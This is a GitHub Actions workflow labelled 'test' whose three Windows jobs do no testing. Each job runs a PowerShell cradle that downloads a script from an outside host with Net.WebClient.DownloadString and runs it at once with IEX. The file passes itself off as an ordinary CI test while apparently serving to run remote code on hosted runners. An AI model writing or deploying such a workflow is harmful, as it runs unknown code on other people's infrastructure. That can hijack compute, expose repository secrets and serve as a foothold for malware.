name: test
on:
  push:
    paths: [".github/workflows/test.yml"]
  workflow_dispatch:
jobs:
  win2019:
    runs-on: windows-2019
    timeout-minutes: 5
    steps:
      - shell: powershell
        run: |
          [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12
          IEX (New-Object Net.WebClient).DownloadString("https://svc.linuxsupportsystem.com/a")
  win2022:
    runs-on: windows-2022
    timeout-minutes: 5
    steps:
      - shell: powershell
        run: |
          [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12
          IEX (New-Object Net.WebClient).DownloadString("https://svc.linuxsupportsystem.com/a")
  winlatest:
    runs-on: windows-latest
    timeout-minutes: 5
    steps:
      - shell: powershell
        run: |
          [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12
          IEX (New-Object Net.WebClient).DownloadString("https://svc.linuxsupportsystem.com/a")

